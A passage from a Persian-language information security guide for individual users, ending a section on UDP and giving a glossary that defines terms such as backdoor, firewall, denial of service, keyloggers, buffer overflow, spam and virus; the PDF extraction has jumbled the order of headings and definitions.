ﺭﺷﺘﻪ ﻫﺎﻱ UDPﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻧﻤﺎﻳﻨﺪ .ﻫﻤﭽﻨـﻴﻦ ﻣﺎﻧﻨـﺪ
ﺩﺭﻳﺎﻓﺖ ﭘﻴـﺎﻡ ﺩﺭ ،TCPﺑﺮﻧﺎﻣـﻪ ﺑﺎﻳـﺪ ﺭﻭﻱ ﭘـﻮﺭﺕ ﺻـﺤﻴﺤﻲ
ﻣﻨﺘﻈﺮ ﺩﺭﻳﺎﻓﺖ ﭘﻴﺎﻡ ﺑﻤﺎﻧـﺪ .ﺩﺭ UDPﻫـﻴﭻ ﺷـﺮﻁ ﻣﺸﺨـﺼﻲ
ﺑﺮﺍﻱ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﻭ ﺗﺼﺪﻳﻖ ﺑـﺴﺘﻪﻫـﺎ ﻭﺟـﻮﺩ ﻧـﺪﺍﺭﺩ ،ﻟـﺬﺍ ﺍﻳـﻦ
158 Reliable Protocol
159 User Datagram Protocol
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
١١٣
ﭘﺮﻭﺗﻜﻞ ﻧﻴﺰ ﻫﻤﺎﻧﻨﺪ IPﻧﺎﻣﻄﻤﺌﻦ ﺍﺳﺖ ﻭ ﭘﻴﺎﻣﻬﺎ ﺩﺭ ﺁﻥ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﮔﻢ ﺷﻮﻧﺪ UDP .ﺩﺭ ﻣﻮﺍﺭﺩﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷـﻮﺩ ﻛـﻪ ﮔـﻢ
ﺷﺪﻥ ﺗﻌﺪﺍﺩﻱ ﺍﺯ ﭘﻴﺎﻣﻬﺎ ﺍﻫﻤﻴﺖ ﭼﻨﺪﺍﻧﻲ ﻧﺪﺍﺷـﺘﻪ ﺑﺎﺷـﺪ ﻭ ﻳـﺎ ﺭﺍﻩ
ﺳﺎﺩﻩ ﺍﻱ ﺑﺮﺍﻱ ﺑﺎﺯﻳﺎﺑﻲ ﭘﻴﺎﻣﻬﺎﻱ ﮔﻤـﺸﺪﻩ ﻣﻮﺟـﻮﺩ ﺑﺎﺷـﺪ .ﺍﻣـﺎ ﺍﺯ
ﻣﺰﺍﻳﺎﻱ ﺍﻳﻦ ﭘﺮﻭﺗﻜﻞ ﻣﻲﺗﻮﺍﻥ ﺑﻪ ﺍﻳﻦ ﻧﻜﺘﻪ ﺍﺷﺎﺭﻩ ﻛﺮﺩ ﻛﻪ ﭼـﻮﻥ
ﻫﻴﭻ ﺗﺼﺪﻳﻖ ﻭ ﺗﺮﺗﻴﺐﺑﻨﺪﻱ ﺧﺎﺻﻲ ﺩﺭ UDPﻭﺟﻮﺩ ﻧﺪﺍﺭﺩ ﺍﻳـﻦ
ﭘﺮﻭﺗﻜﻞ ﻣﻨﺎﺑﻊ ﺑﺴﻴﺎﺭ ﻛﻤﺘﺮﻱ ﺍﺯ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﻜﺎﺭ ﻣﻲﮔﻴﺮﺩ.
ﺑﺨﺶ ﺩﻭﻡ
١١٥
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
ﺩﺭﺏ ﻣﺨﻔﻲ
ﺿﻤﻴﻤﺔ ۳
ﻭﺍﮊﻩﻧﺎﻣﺔ ﺍﺻﻄﻼﺣﺎﺕ ﻓﻨﻲ
ﭘﺴﺖ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ
١٦٠
ﻣﻌﺎﺩﻝ ﺭﺍﻳﺎﻧﻪﺍﻱ ﭘﺴﺖ ﻧﺎﻣـﻪﻫـﺎ .ﺁﺩﺭﺳـﻬﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ ،ﻧﺎﻣﻪ ﺍﺭﺳﺎﻝ ﻳﺎ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ.
ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺗﻤﺎﻣﻲ ﻧﺎﻣﻪﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺯ ﻣﺘﻮﻥ
ﻗﺎﺑــﻞ ﭼــﺎﭖ )ﻛﺎﺭﺍﻛﺘﺮﻫــﺎﻱ ﻏﻴﺮﻛﻨﺘﺮﻟــﻲ (ASCIIﺗــﺸﻜﻴﻞ
ﺷﺪﻩﺍﻧﺪ.
ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ
ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﮔﺬﺭ ﺍﺯ ﻭﺭﻭﺩ ﻋﺎﺩﻱ ﻭ ﺍﻳﻤـﻦ ﺑـﻪ ﺳﻴـﺴﺘﻢ ﻭ
ﺑﺪﺳﺖ ﺁﻭﺭﺩﻥ ﻛﻨﺘﺮﻝ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑـﺪﻭﻥ ﻛـﺴﺐ ﺍﺟـﺎﺯﻩ ﺍﺯ
ﺻﺎﺣﺐ ﺁﻥ ﺍﺳـﺖ .ﺍﮔـﺮ ﺩﺭﺏ ﻣﺨﻔـﻲ ﺭﻭﻱ ﻳـﻚ ﺭﺍﻳﺎﻧـﺔ
ﻣﺘﺼﻞ ﺑﻪ ﺷﺒﻜﻪ ﻧﺼﺐ ﺷﻮﺩ ﻣﻤﻜﻦ ﺍﺳﺖ ﻫﺮ ﺷﺨﺼﻲ ﺩﺭ
ﺍﻳﻨﺘﺮﻧﺖ ﺑﺘﻮﺍﻧﺪ ﺑﺪﻭﻥ ﺍﻃﻼﻉ ﻭ ﺭﺿﺎﻳﺖ ﻣﺎﻟـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑـﻪ
ﺁﻥ ﻭﺍﺭﺩ ﺷﻮﺩ ﻭ ﻛﻨﺘﺮﻝ ﺁﻧﺮﺍ ﺑﺪﺳﺖ ﮔﻴﺮﺩ.
ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲ ﺗﻮﺍﻧـﺪ ﺗﺒـﺎﺩﻝ ﻏﻴﺮﻣﻨﺘﻈـﺮﻩ ﻭ ﻏﻴﺮﻣﺠـﺎﺯ
ﺍﻃﻼﻋﺎﺕ ﻣﻴﺎﻥ ﺷﻤﺎ ﻭ ﺩﻧﻴﺎﻱ ﺧﺎﺭﺝ ﺍﺯ ﺁﻧﺮﺍ ﻣـﺴﺪﻭﺩ ﻛﻨـﺪ.
ﺩﻳﻮﺍﺭﻩﻫﺎﻱ ﺁﺗﺶ ﺩﻭ ﻧﻮﻉ ﻫﺴﺘﻨﺪ :ﺩﻳﻮﺍﺭﺓ ﺁﺗﺶ ﻣـﻲﺗﻮﺍﻧـﺪ
ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺑﺎﺷﺪ ﻛﻪ ﺭﻭﻱ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺟـﺮﺍ ﻣـﻲﺷـﻮﺩ ﻳـﺎ
ﻗﻄﻌﺔ ﺳﺨﺖ ﺍﻓﺰﺍﺭﻱ ﻣﺠﺰﺍﻳﻲ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﺁﻧﭽﻪ ﺩﺭ ﺷﺒﻜﻪ
ﺩﺭﻳﺎﻓﺖ ﻭ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﺩ ﻧﻈﺎﺭﻩ ﻣﻲﻛﻨﺪ.
١٦١
ﺭﻣﺰﮔﺬﺍﺭﻱ
ﺣﻤﻠﺔ ﺗﺨﺮﻳﺐ ﺳﺮﻭﻳﺲ ﺯﻣﺎﻧﻲ ﺍﺗﻔﺎﻕ ﻣﻲ ﺍﻓﺘﺪ ﻛـﻪ ﺭﺍﻳﺎﻧـﻪ
ﻣﺘﺼﻞ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺗﻮﺳﻂ ﭘﻴﺎﻣﻬـﺎﻱ ﺑـﺴﻴﺎﺭ ﺯﻳـﺎﺩ ﻭ ﻏﻴـﺮ
ﺣﻘﻴﻘﻲ ﺑﻤﺒﺎﺭﺍﻥ ﺷـﻮﺩ؛ ﺑﻄﻮﺭﻳﻜـﻪ ﺗﻤـﺎﻣﻲ ﻭﻗـﺖ ﺧـﻮﺩ ﺭﺍ
ﺻﺮﻑ ﭘﺎﺳﺦ ﺩﺍﺩﻥ ﺑﻪ ﺍﻳﻦ ﭘﻴﺎﻣﻬﺎ ﻧﻤﺎﻳﺪ ﻭ ﻣﺠـﺎﻟﻲ ﺑـﺮﺍﻱ
ﻋﺒﻮﺭ ﺗﺮﺍﻓﻴﻚ ﻛﺎﺭﺑﺮ ﻭﺍﻗﻌﻲ ﺑﺎﻗﻲ ﻧﻤﺎﻧﺪ.
ﺛﺒﺖﻛﻨﻨﺪﻩﻫﺎﻱ ﻛﻠﻴﺪ
١٦٢
ﺑﺮﻧﺎﻣــﻪﺍﻱ ﻛــﻪ ﻫﺮﺁﻧﭽــﻪ ﺍﺯ ﻃﺮﻳــﻖ ﺻــﻔﺤﻪﻛﻠﻴــﺪ ﺗﺎﻳــﭗ
ﻣﻲﺷﻮﺩ ﺭﺍ ﺛﺒﺖ ﻣﻲﻛﻨﺪ .ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﻨـﺪ ﺭﻭﻱ ﺩﻳـﺴﻚ
ﻧﻮﺷﺘﻪ ﻭ ﻳﺎ ﺍﺯ ﻃﺮﻳـﻖ ﺍﻳﻨﺘﺮﻧـﺖ ﺑـﺮﺍﻱ ﺷـﺨﺺ ﺩﻳﮕـﺮﻱ
ﺍﺭﺳﺎﻝ ﮔﺮﺩﻧﺪ .ﺍﮔﺮ ﺛﺒـﺖﻛﻨﻨـﺪﻩﻫـﺎﻱ ﺻـﻔﺤﻪﻛﻠﻴـﺪ ﺭﻭﻱ
ﺭﺍﻳﺎﻧﻪﺍﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ،ﻫﺮﺁﻧﭽﻪ ﻛﻪ ﻭﺍﺭﺩ ﺭﺍﻳﺎﻧﻪ ﮔﺮﺩﺩ
ﻣﺜﻞ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ -ﺛﺒﺖ ﻣﻲﺷـﻮﺩ؛ ﺩﻗﻴﻘـﹰﺎﻣﺸﺎﺑﻪ ﺣﺎﻟﺘﻲ ﻛﻪ ﺷﻤﺎ ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣـﺰ ﻋﺒـﻮﺭ ﺧـﻮﺩ ﺭﺍ
ﻭﺍﺭﺩ ﻣﻲﻛﻨﻴﺪ ﻭ ﺷﺨﺼﻲ ﺑﺎﻻﻱ ﺳﺮﺗﺎﻥ ﺍﻳﺴﺘﺎﺩﻩ ﺍﺳﺖ!
160 Email
161 Denial of Service
162 Keyloggers
١٦٤
١٦٥
ﺭﻭﺷﻲ ﺑﺮﺍﻱ ﻣﺨﻔﻲ ﻛﺮﺩﻥ ﻣﺤﺘﻮﺍﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎﻋـﺚ
ﻣﻲﮔﺮﺩﺩ ﺍﻃﻼﻋﺎﺕ ﺑﺮﺍﺣﺘﻲ ﻗﺎﺑﻞ ﺧﻮﺍﻧـﺪﻥ ﻧﺒﺎﺷـﻨﺪ ،ﻣﮕـﺮ
ﺑﺮﺍﻱ ﻛﺴﻲ ﻛﻪ ﻗﺮﺍﺭ ﺍﺳﺖ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻛﻨـﺪ.
ﺩﺭ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻳـﻚ "ﻛﻠﻴـﺪ" ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺑـﺮ ﺍﺳـﺎﺱ
ﻳﻜﺴﺮﻱ ﻗﻮﺍﻧﻴﻦ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩ ﺍﺳﺖ ﻭ ﺑﺮﺍﻱ ﺗﻐﻴﻴﺮ ﻇﺎﻫﺮﻱ
ﺍﻃﻼﻋﺎﺕ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﻣـﻲﮔﻴـﺮﺩ .ﺍﻳـﻦ ﺍﻃﻼﻋـﺎﺕ
ﺯﻣﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﺪ ﺧﻮﺍﻧﺪﻩ ﺷﻮﺩ ﻛﻪ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺷﺪﻩ ﺑﺎﺷـﺪ ﻭ
ﺑﺮﺍﻱ ﺭﻣﺰﮔﺸﺎﻳﻲ ﺁﻥ ﻻﺯﻡ ﺍﺳﺖ ﻓﺮﺩ ﺩﺭﻳﺎﻓﺖﻛﻨﻨـﺪﻩ ،ﻫـﻢ
ﻛﻠﻴﺪ ﻭ ﻫﻢ ﺭﻭﺵ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺁﻧﺮﺍ ﺑﺪﺍﻧﺪ.
ﺳﺮﺭﻳﺰﻱ ﺑﺎﻓﺮ
١٦٦
ﻳﻚ ﺍﺷﻜﺎﻝ ﻧﺮﻡ ﺍﻓﺰﺍﺭﻱ ﺍﺳﺖ ﻭ ﻫﻨﮕﺎﻣﻲ ﺍﺗﻔﺎﻕ ﻣـﻲﺍﻓﺘـﺪ
ﻛﻪ ﻳﻚ ﺑﺮﻧﺎﻣﻪ ﺩﺍﺩﻩﻫﺎﻱ ﺧﻮﺩ ﺭﺍ ﺑـﻪ ﻓـﻀﺎﻳﻲ ﺩﺭ ﺣﺎﻓﻈـﻪ
ﻣﻨﺘﻘﻞ ﻣﻲﻛﻨﺪ ﻛﻪ ﺩﺭ ﺁﻥ ﺟﺎﻱ ﻛﺎﻓﻲ ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎ ﻭﺟـﻮﺩ
ﻧﺪﺍﺭﺩ .ﺩﺭ ﺍﻳﻨﺤﺎﻟﺖ ﺑﺮﻧﺎﻣﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺩﺍﺩﻩﻫﺎﻱ ﻗﺒﻠـﻲ ﺭﺍ
ﺍﺯ ﺣﺎﻓﻈﻪ ﺑﻴﺮﻭﻥ ﺑﻴﺎﻧﺪﺍﺯﺩ ﻭ ﺳﻌﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻓـﻀﺎﻳﻲ ﺭﺍ
ﺑﺮﺍﻱ ﺩﺍﺩﻩﻫﺎﻱ ﺟﺪﻳﺪ ﻣﻬﻴﺎ ﺳﺎﺯﺩ.
Backdoor
Firewall
Encryption
Buffer Overflow
163
164
165
166
ﺑﺨﺶ ﺩﻭﻡ
ﺗﻌﺎﺭﻳﻒ ﺍﺻﻄﻼﺣﺎﺕ ﺩﺭ ﺣﻮﺯﺓ ﻣﺘﻮﻥ ﺍﻣﻨﻴﺘﻲ
١٦٣
١١٦
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻦ ﺍﻳﻦ ﺩﺍﺩﻩﻫﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎﻋﺚ ﺍﻳﺠﺎﺩ ﻣـﺸﻜﻼﺕ
ﻻ ﻳﻜﭙـﺎﺭﭼﮕﻲ ﻭ ﺍﻣﻨﻴـﺖ ﺑﺮﻧﺎﻣـﻪ ﺭﺍ
ﺯﻳﺎﺩﻱ ﮔﺮﺩﺩ ﻭ ﻣﻌﻤـﻮ ﹰ
ﺧﺪﺷﻪﺩﺍﺭ ﻣﻲﻛﻨﺪ .ﺑﺎ ﺑﺮﺭﺳﻲ ﻓﻀﺎﻱ ﻛﺎﻓﻲ ﺣﺎﻓﻈﻪ ﻗﺒﻞ ﺍﺯ
ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺁﻥ ﻣﻲ ﺗـﻮﺍﻥ ﺍﺯ ﻭﻗـﻮﻉ ﺍﻳـﻦ ﻣـﺴﺌﻠﻪ
ﺟﻠﻮﮔﻴﺮﻱ ﻛﺮﺩ.
ﺳﺮﻗﺖ ﻫﻮﻳﺖ
١٦٧
ﺳــﺮﻗﺖ ﻫﻮﻳــﺖ ﺯﻣــﺎﻧﻲ ﺍﺗﻔــﺎﻕ ﻣــﻲﺍﻓﺘــﺪ ﻛــﻪ ﺷــﺨﺺ
ﺍﻃﻼﻋﺎﺕ ﻛﺎﻓﻲ ﺩﺭ ﻣﻮﺭﺩ ﺷﻤﺎ ﺟﻤﻊﺁﻭﺭﻱ ﻛـﺮﺩﻩ ﺑﺎﺷـﺪ ﻭ
ﻼ ﺩﺭ
ﺑﺎ ﺁﻥ ﺍﻃﻼﻋﺎﺕ ﺑﺘﻮﺍﻧﺪ ﺧﻮﺩ ﺭﺍ ﺑﺠﺎﻱ ﺷﻤﺎ ﺟﺎ ﺑﺰﻧﺪ )ﻣﺜ ﹰ
ﺑﺎﻧﻜﻬﺎ ،ﻓﺮﻭﺷﮕﺎﻫﻬﺎ ،ﻳﺎ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺩﻭﻟﺘﻲ(.
ﺿﻤﻴﻤﻪ
ﻫﺴﺘﻨﺪ ،ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﻣﺘﻦ ﺑﺎﺯ -ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ
ﻛﻪ ﺭﺍﻳﮕـﺎﻥ ﻫـﺴﺘﻨﺪ ﻭ ﭼـﻪ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﻓـﺮﻭﺵ
ﻣﻲﺑﺎﺷﻨﺪ -ﻗﺎﺑﻠﻴﺘﻬﺎﻳﻲ ﺩﺍﺭﻧﺪ ﻛـﻪ ﻣـﺸﺎﺑﻪ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ
ﺍﻧﺤﺼﺎﺭﻱ ﺍﺳﺖ ﻭ ﻣﻤﻜﻦ ﺍﺳـﺖ ﻫﺰﻳﻨـﺔ ﺑـﺎﻻﻳﻲ ﺩﺍﺷـﺘﻪ
ﺑﺎﺷــﺪ .ﮔــﺎﻫﻲ ﺍﻭﻗــﺎﺕ ﺑﺮﻧﺎﻣــﻪﻫــﺎﻱ ﻣــﺘﻦﺑــﺎﺯ ﺗﺤــﺖ
ﻣﻮﺍﻓﻘﺘﻨﺎﻣﻪﻫﺎ ﻭ ﻣﺠﻮﺯﻫﺎﻱ ﺧﺎﺹ ﺑﺼﻮﺭﺕ ﻏﻴﺮ ﺭﺍﻳﮕﺎﻥ ﺩﺭ
ﻗﺴﻤﺘﻬﺎﻳﻲ ﺍﺯ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺗﺠﺎﺭﻱ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﻧﺪ.
ﺑﺮﺍﻱ ﺍﻃﻼﻋـﺎﺕ ﺑﻴـﺸﺘﺮ ﺩﺭ ﺍﻳـﻦ ﺯﻣﻴﻨـﻪ ﻣـﻲﺗﻮﺍﻧﻴـﺪ ﺑـﻪ
ﭘﺎﻳﮕﺎﻫﻬﺎﻱ ﺯﻳﺮ ﻣﺮﺍﺟﻌﻪ ﻧﻤﺎﻳﻴﺪ:
http://www.fsf.org
http://www.opensource.org
١٦٨
ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ
ﺿﻤﻴﻤﻪ ﻗﺴﻤﺘﻲ ﺍﺯ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺍﺳﺖ ﻛﻪ ﺑﺎ ﺍﺳـﺘﻔﺎﺩﻩ
ﺍﺯ ﺁﻥ ﻣﻲﺗﻮﺍﻥ ﺍﻧﻮﺍﻉ ﻓﺎﻳﻠﻬﺎ ﻣﺜﻞ ﻓﺎﻳﻠﻬﺎﻱ ﻣـﺘﻦ ﻭ ﺗـﺼﻮﻳﺮ
ﺭﺍ ﺍﻧﺘﻘﺎﻝ ﺩﺍﺩ .ﺗﻤﺎﻣﻲ ﻓﺎﻳﻠﻬﺎﻱ ﻏﻴﺮ ﻣﺘﻨﻲ ﺑﺮﺍﻱ ﺍﺭﺳﺎﻝ ﺑﺎﻳﺪ
ﺑﺼﻮﺭﺕ ﻗﺎﺑﻞ ﭼﺎﭖ )ﻣﺘﻦﺳﺎﺩﻩ( ﺩﺭﺁﻳﻨﺪ .ﺗﻤﺎﻣﻲ ﺁﻧﭽﻪ ﻛﻪ ﺩﺭ
ﺭﺍﻳﺎﻧﻪ ﺫﺧﻴﺮﻩ ﻣﻲﺷﻮﺩ ﺗﺮﻛﻴﺒﻲ ﺍﺯ ﺍﺭﻗـﺎﻡ ۰ﻭ ۱ﺍﺳـﺖ .ﺑـﻪ
ﺯﺑﺎﻥ ﺳﺎﺩﻩﺗﺮ ﻛﺪﮔﺬﺍﺭﻱ ﺍﻳﻦ ﺻﻔﺮﻫﺎ ﻭ ﻳﻚﻫﺎ ﺭﺍ ﺑﺎ ﺗﺒﺪﻳﻞ
ﺑﻪ ﻣﺘﻮﻥ ﺳﺎﺩﻩ ،ﻗﺎﺑﻞ ﺍﺭﺳﺎﻝ ﻣﻲﻛﻨﺪ.
ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ
ﻓﺮﺁﻳﻨﺪ ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﺍﺯ ﻓﺎﻳﻠﻬﺎﻱ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻣﺤﻠﻬـﺎﻱ
ﺩﻳﮕﺮ ﺩﺭ ﻫﻤﺎﻥ ﺭﺍﻳﺎﻧﻪ ﻭ ﻳـﺎ ﺭﻭﻱ ﺍﺑﺰﺍﺭﻫـﺎﻱ ﺟـﺎﻧﺒﻲ ﻛـﻪ
ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺴﺘﻘﻞ ﺍﺯ ﺁﻥ ﺭﺍﻳﺎﻧـﻪ ﺑﺎﺷـﻨﺪ .ﻧـﺴﺨﻪ ﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﺑﺎﻋﺚ ﻣﻲﺷﻮﻧﺪ ﺑﺘﻮﺍﻧﻴﺪ ﺩﺍﺩﻩﻫـﺎﻳﻲ ﻛـﻪ ﺑـﻪ ﻫـﺮ
ﻼ ﺑﻄﻮﺭ ﺗﺼﺎﺩﻓﻲ ﭘﺎﻙ ﺷﺪﻩﺍﻧﺪ ،ﺁﺳـﻴﺐ
ﺩﻟﻴﻠﻲ ﺍﺯ ﺑﻴﻦ ﺭﻓﺘﻪﺍﻧﺪ )ﻣﺜ ﹰ
ﻓﻴﺰﻳﻜﻲ ﺩﻳﺪﻩﺍﻧﺪ ،ﻭ ﻳﺎ ﻣﻮﺭﺩ ﺳـﺮﻗﺖ ﻗـﺮﺍﺭ ﮔﺮﻓﺘـﻪﺍﻧـﺪ( ﺭﺍ ﺑﺎﺯﻳـﺎﺑﻲ
ﻧﻤﺎﻳﻴﺪ.
١٦٩
ﻫﺮﺯﻧﺎﻣﻪ
ﻧﺎﻡ ﻛﺎﺭﺑﺮﻱ ﻭ ﺭﻣﺰ ﻋﺒﻮﺭ ﻣﺤﺮﻣﺎﻧﻪ ﻛﻪ ﻛﺎﺭﺑﺮ ﺭﺍ ﺑﺮﺍﻱ ﻳـﻚ
ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭ ﻳﺎ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺷﻨﺎﺳـﺎﻳﻲ ﻭ ﺗـﺼﺪﻳﻖ
ﻫﻮﻳﺖ ﻣﻲﻛﻨﺪ.
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ
١٧١
١٧٢
ﺗﺒﻠﻴﻐﺎﺕ ﻭ ﺩﻳﮕﺮ ﻧﺎﻣﻪ ﻫﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻛﻪ ﺑـﺪﻭﻥ ﺍﻳﻨﻜـﻪ
ﺷﻤﺎ ﺧﻮﺍﺳﺘﻪ ﺑﺎﺷﻴﺪ ﺑﺮﺍﻱ ﺷﻤﺎ ﺍﺭﺳﺎﻝ ﻣﻲﺷﻮﻧﺪ.
ﻭﻳﺮﻭﺱ
١٧٠
ﻧﺮﻡﺍﻓﺰﺍﺭﻫﺎﻳﻲ ﻛﻪ ﻣﺘﻦ ﺑﺮﻧﺎﻣﺔ ﺁﻧﻬﺎ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻋﻤﻮﻡ ﺍﺳـﺖ
ﻭ ﻫﻤﻪ ﻣﻲ ﺗﻮﺍﻧﻨﺪ ﺁﺯﺍﺩﺍﻧﻪ ﺁﻧﻬـﺎ ﺭﺍ ﺍﺻـﻼﺡ ﻛﻨﻨـﺪ ﻭ ﺗﻐﻴﻴـﺮ
ﺩﻫﻨﺪ .ﺑﻪ ﺩﻟﻴﻞ ﺩﺭ ﺩﺳـﺘﺮﺱ ﺑـﻮﺩﻥ ﻣـﺘﻦ ﺑﺮﻧﺎﻣـﻪ ،ﺍﻓـﺮﺍﺩ
ﻣﻲﺗﻮﺍﻧﻨﺪ ﻧﺤﻮﺓ ﻋﻤﻠﻜﺮﺩ ﺁﻧﺮﺍ ﺑﺒﻴﻨﻨـﺪ ﻭ ﺑـﻪ ﺩﻟﺨـﻮﺍﻩ ﺧـﻮﺩ
ﻻ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﺑﺮﻧﺎﻣﻪ ﻫﺎﻱ ﻣﺘﻦﺑﺎﺯ ﺳﺎﻳﺮ
ﺗﻐﻴﻴﺮ ﺩﻫﻨﺪ .ﻣﻌﻤﻮ ﹰ
ﺑﺮﻧﺎﻣــﻪﻧﻮﻳــﺴﺎﻥ ﺭﺍ ﺗــﺸﻮﻳﻖ ﺑــﻪ ﻣــﺸﺎﺭﻛﺖ ﺩﺭ ﺗﻮﺳــﻌﻪ ﻭ
ﮔﺴﺘﺮﺵ ﻗﺎﺑﻠﻴﺘﻬﺎﻱ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪﻫﺎ ﻣﻲﻧﻤﺎﻳﻨﺪ .ﺑﺮﻧﺎﻣﻪﻫـﺎﻱ
ﻣﺘﻦﺑـﺎﺯ ﻫﻤﭽﻨـﻴﻦ ﺷـﺎﻣﻞ ﻧـﺮﻡﺍﻓﺰﺍﺭﻫـﺎﻱ ﺭﺍﻳﮕـﺎﻥ ﻫـﻢ
Identity Theft
Attachment
Username & Password
Open-Source Software
167
168
169
170
١٧٣
ﺍﺻﻄﻼﺡ "ﻭﻳﺮﻭﺱ" ﻣﻌﻨﺎﻱ ﺧﺎﺻﻲ ﺩﺍﺭﺩ ﻛﻪ ﺩﺭ ﺑﺨـﺸﻬﺎﻱ
ﺁﺗﻲ ﺑﻴﺸﺘﺮ ﻣﻮﺭﺩ ﺑﺤﺚ ﻭ ﺑﺮﺭﺳﻲ ﻗﺮﺍﺭ ﻣﻲ ﮔﻴـﺮﺩ .ﺩﺭﺣـﺎﻝ
ﺣﺎﺿﺮ ﻭﻳﺮﻭﺱ ﺑﻪ ﻣﺠﻤﻮﻋﺔ ﻫﻤـﺔ ﺑﺮﻧﺎﻣـﻪﻫـﺎﻳﻲ ﺍﻃـﻼﻕ
ﻣﻲﮔﺮﺩﺩ ﻛﻪ ﺩﺭ ﺭﺍﻳﺎﻧﺔ ﺷـﻤﺎ ﻇـﺎﻫﺮ ﻣـﻲﺷـﻮﻧﺪ ﻭ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﺑﻪ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﮕﺮ ﻧﻴـﺰ ﺳـﺮﺍﻳﺖ ﻛﻨﻨـﺪ ﻭ ﺑـﻪ ﺁﻧﻬـﺎ
ﺁﺳﻴﺒﻬﺎﻱ ﺟﺪﻱ ﻭﺍﺭﺩ ﻧﻤﺎﻳﻨﺪ.
171 Backup
172 Spam
173 Virus
١١٧
ﺑﺨﺶ ﺩﻭﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﮐﺎﺭﺑﺮﺍﻥ ﻣﻨﻔﺮﺩ
URL
Cookie
